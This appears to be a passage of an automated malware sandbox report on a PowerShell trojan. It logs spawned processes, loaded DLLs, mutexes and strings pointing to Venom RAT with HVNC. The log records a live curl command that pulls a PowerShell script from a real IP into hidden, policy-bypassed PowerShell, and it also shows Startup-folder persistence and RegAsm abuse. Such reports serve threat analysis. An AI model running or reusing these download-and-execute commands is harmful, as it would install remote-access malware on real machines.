nLvfuE3MjgiOTGxdnLzLLq9/Lqxobgzu32zeXhw8vVwcjfx72r16DDuS0MGDwRFhUCNy40TFw9PyBwNSgMdg5YNTMaEWEHDzQrWnAYBzkrZwM6FwI8WAkJJV8RHnxCPgoDBx4lOCQUWj8AMBsIIRV0THdZZmlSImNjeV8GQhNcDWpBYElOSUlTRg1Na29HQU4xXS5vUkJtQkZ+JWM0fSZEUD9FYkk6QkVdoZOzuZPxuY+Q6aWulJ+N2MfQgKKuh8uh3eOJ+/GBtrKv+5KJ74SGi/6YhomywoWatJTdub2Vl5fmj67nmpGIqtLw5+nI4NngjNb7wPPFxYT0+5H/jo369cry3eXr/8KpgN/909n8zL7gydPJ9M791NDdrLmd+Nq4/tvznvzNxa8OQTMLMjQNOAwxKBUwSFUSOiUYPSt6KxkjMUA7GRAaBiAMOz4VHzF+ZklHZ1Y+TkJ8CTsnAnkFMCAlEhYxBR0RYGludQ4sd0VrSiNsaGpDUm1JB1cDXXhNLjleTlF9WkYpP2p5enxgRHJ8SWgJOntNeV1wcgBAMH5PJ3JjeCc3cdCer5fO/52OqK/dvqzXuJeltY2Kv5zNsKHLk6qQoLulrZjO74yEsLyDoICMn5qmpuWVpsn3h7+vsbGJi+GSkea2vKSopbGwjtP
                  Source: nfy3200k.dll.7.dr, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@16/18@1/2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.urlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Q5K38PhTmmcj2+k2j8DpuVvh9ZIMLJuxELkYByZGDvrGw54cNpyVFQUstlYPj3i/Y8eEOiPnJFCzM2yqgjC5F4RKcz7ZjLOfTdtYNpWDiwk=
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfnvbu32.mp3.ps1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES617A.tmp" "c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1 Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES617A.tmp" "c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devenum.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msdmo.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mmdevapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: Automation.pdb source: powershell.exe, 00000005.00000002.2351616241.0000029DF4150000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: :C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.pdb source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: :C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.pdbhP source: powershell.exe, 00000005.00000002.2255186878.0000029DDDAB6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\SYSTEM32\rasman.dll.pdb source: powershell.exe, 00000005.00000002.2349927128.0000029DF3D9E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: AL_MACHINE\SOFTWARE\Microsoft\.NETFramework.pdb source: powershell.exe, 00000005.00000002.2349927128.0000029DF3D9E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp
